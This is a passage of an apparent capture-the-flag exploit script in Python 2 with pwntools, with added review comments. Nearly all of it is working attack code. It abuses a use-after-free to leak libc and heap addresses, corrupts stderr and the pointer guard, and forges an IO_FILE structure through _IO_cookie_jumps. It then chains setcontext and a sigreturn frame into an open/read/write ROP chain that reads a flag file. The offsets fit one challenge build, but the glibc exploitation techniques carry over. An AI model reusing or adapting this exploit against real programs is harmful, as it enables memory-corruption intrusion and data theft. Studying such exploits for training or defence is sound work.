| all_payload += payload
def delete(idx):
    """Queue a delete command for slot *idx* in the pending batch.

    Wire layout is one opcode byte (0x2, the delete command as this
    script names it) followed by one index byte. Nothing is sent here;
    the bytes are appended to the module-level ``all_payload`` buffer
    and flushed later by run_opcode().
    """
    global all_payload
    all_payload += p8(0x2) + p8(idx)
def edit(idx, buf):
    """Queue an edit command that writes *buf* into slot *idx*.

    Wire layout: opcode byte 0x4, index byte, a p16-packed length, then
    the raw content. ``str(buf)`` is applied so that non-string objects
    (a SigreturnFrame, for instance) serialize the same way a plain
    string does; this relies on Python 2 / pwntools str-as-bytes
    semantics, as does the rest of the script. The batch is only sent
    by run_opcode().
    """
    global all_payload
    header = p8(0x4) + p8(idx) + p16(len(buf))
    all_payload += header + str(buf)
def run_opcode():
    """Flush the pending batch to the target.

    Appends the run opcode (5), waits for the target's
    "Pls input the opcode" prompt, sends the whole accumulated buffer,
    and then resets ``all_payload`` so the next batch starts empty.
    The reset deliberately happens only after the send returns, so a
    failed send leaves the batch intact for inspection.
    """
    global all_payload
    all_payload += p8(5)
    batch = all_payload
    sh.sendafter("Pls input the opcode", batch)
    all_payload = ""
# --- Exploit sequence for a CTF heap challenge (Python 2 / pwntools) --------
# NOTE(review): every numeric offset below (0x1f30b0, 0x2035f0, 0x2ae0,
# 0x22a0, the gadget offsets, the "+ 61" on setcontext) is hard-coded for one
# specific libc and challenge binary; the script is not portable across builds.
# NOTE(review): show(2) / edit(2) are issued after delete(2), and edit(7)
# after delete(7), so the script presumably depends on the target still
# honoring operations on a freed slot (a use-after-free class bug) -- confirm
# against the challenge binary. From a defender's view that is the root cause;
# the leaks and overwrites that follow are consequences of it.

# Batch 1: allocate several slots, free slot 2, show it; the bytes the target
# prints back are consumed below to derive libc_base.
add(0, 0x410)
add(1, 0x410)
add(2, 0x420)
add(3, 0x410)
delete(2)
add(4, 0x430)
show(2)
run_opcode()

# Take the 6 bytes ending at the first 0x7f, zero-extend to 8, subtract the
# build-specific offset of the leaked pointer from the libc base.
libc_base = u64(sh.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 0x1f30b0
log.success("libc_base:\t" + hex(libc_base))
libc.address = libc_base

# libc-relative addresses used by the later stages (see build note above).
guard = libc_base + 0x2035f0
pop_rdi_addr = libc_base + 0x2daa2
pop_rsi_addr = libc_base + 0x37c0a
pop_rax_addr = libc_base + 0x446c0
syscall_addr = libc_base + 0x883b6
gadget_addr = libc_base + 0x146020
setcontext_addr = libc_base + 0x50bc0

# Batch 2: overwrite the first 0x10 bytes of slot 2 and show it again; the
# 6 bytes following the marker are a heap pointer, offset 0x2ae0 from heap_base.
edit(2, "a" * 0x10)
show(2)
run_opcode()
sh.recvuntil("a" * 0x10)
heap_base = u64(sh.recv(6).ljust(8, '\x00')) - 0x2ae0
log.success("heap_base:\t" + hex(heap_base))

# Batches 3-4: heap-layout manipulation built from the two leaked bases and the
# build-specific constants above. Slot indices 0 and 2 are freed and
# re-added within the same batch.
delete(0)
edit(2, p64(libc_base + 0x1f30b0) * 2 + p64(heap_base + 0x2ae0) + p64(libc.sym['stderr'] - 0x20))
add(5, 0x430)
edit(2, p64(heap_base + 0x22a0) + p64(libc_base + 0x1f30b0) + p64(heap_base + 0x22a0) * 2)
edit(0, p64(libc_base + 0x1f30b0) + p64(heap_base + 0x2ae0) * 3)
add(0, 0x410)
add(2, 0x420)
run_opcode()

delete(2)
add(6, 0x430)
delete(0)
edit(2, p64(libc_base + 0x1f30b0) * 2 + p64(heap_base + 0x2ae0) + p64(guard - 0x20))
add(7, 0x450)
edit(2, p64(heap_base + 0x22a0) + p64(libc_base + 0x1f30b0) + p64(heap_base + 0x22a0) * 2)
edit(0, p64(libc_base + 0x1f30b0) + p64(heap_base + 0x2ae0) * 3)
add(2, 0x420)
add(0, 0x410)

# Slot 7 is edited after it is freed: 0x438 filler bytes then a size field.
delete(7)
add(8, 0x430)
edit(7, 'a' * 0x438 + p64(0x300))
run_opcode()

# Forged file structure. The ljust() calls pad to fixed field offsets
# (0x58, 0x78, 0xB0, 0xC8); the final entry is gadget_addr masked against a
# heap address and rotated by 0x11 (ROL is a helper defined outside this view).
next_chain = 0
srop_addr = heap_base + 0x2ae0 + 0x10
fake_IO_FILE = 2 * p64(0)
fake_IO_FILE += p64(0)
fake_IO_FILE += p64(0xffffffffffffffff)
fake_IO_FILE += p64(0)
fake_IO_FILE += p64(0)
fake_IO_FILE += p64(0)
fake_IO_FILE = fake_IO_FILE.ljust(0x58, '\x00')
fake_IO_FILE += p64(next_chain)
fake_IO_FILE = fake_IO_FILE.ljust(0x78, '\x00')
fake_IO_FILE += p64(heap_base)
fake_IO_FILE = fake_IO_FILE.ljust(0xB0, '\x00')
fake_IO_FILE += p64(0)
fake_IO_FILE = fake_IO_FILE.ljust(0xC8, '\x00')
fake_IO_FILE += p64(libc.sym['_IO_cookie_jumps'] + 0x40)
fake_IO_FILE += p64(srop_addr)
fake_IO_FILE += p64(0)
fake_IO_FILE += p64(ROL(gadget_addr ^ (heap_base + 0x22a0), 0x11))

# Sigreturn frame placed at srop_addr; rsp/rdi point just past the 0xF8-byte
# region that holds the frame body, where rop_data is laid out below.
fake_frame_addr = srop_addr
frame = SigreturnFrame()
frame.rdi = fake_frame_addr + 0xF8
frame.rsi = 0
frame.rdx = 0x100
frame.rsp = fake_frame_addr + 0xF8 + 0x10
frame.rip = pop_rdi_addr + 1

# Three syscall groups selected via rax (2, 0, 1) operating on the 'flag'
# path and a buffer at fake_frame_addr + 0x200.
rop_data = [
    pop_rax_addr, 2, syscall_addr,
    pop_rax_addr, 0, pop_rdi_addr, 3, pop_rsi_addr, fake_frame_addr + 0x200, syscall_addr,
    pop_rax_addr, 1, pop_rdi_addr, 1, pop_rsi_addr, fake_frame_addr + 0x200, syscall_addr
]
# The frame is serialized with str(); its first 0x28 bytes are dropped because
# the preceding 0x28 bytes of payload stand in for them.
payload = p64(0) + p64(fake_frame_addr) + '\x00' * 0x10 + p64(setcontext_addr + 61)
payload += str(frame).ljust(0xF8, '\x00')[0x28:] + 'flag'.ljust(0x10, '\x00') + flat(rop_data)

# Final batch: install both forged buffers, then one more allocation triggers
# the target. Index 8 is reused from the earlier add(8, 0x430) -- presumably
# deliberate, verify the target accepts a duplicate index.
edit(0, fake_IO_FILE)
edit(2, payload)
add(8, 0x450)
run_opcode()
sh.interactive()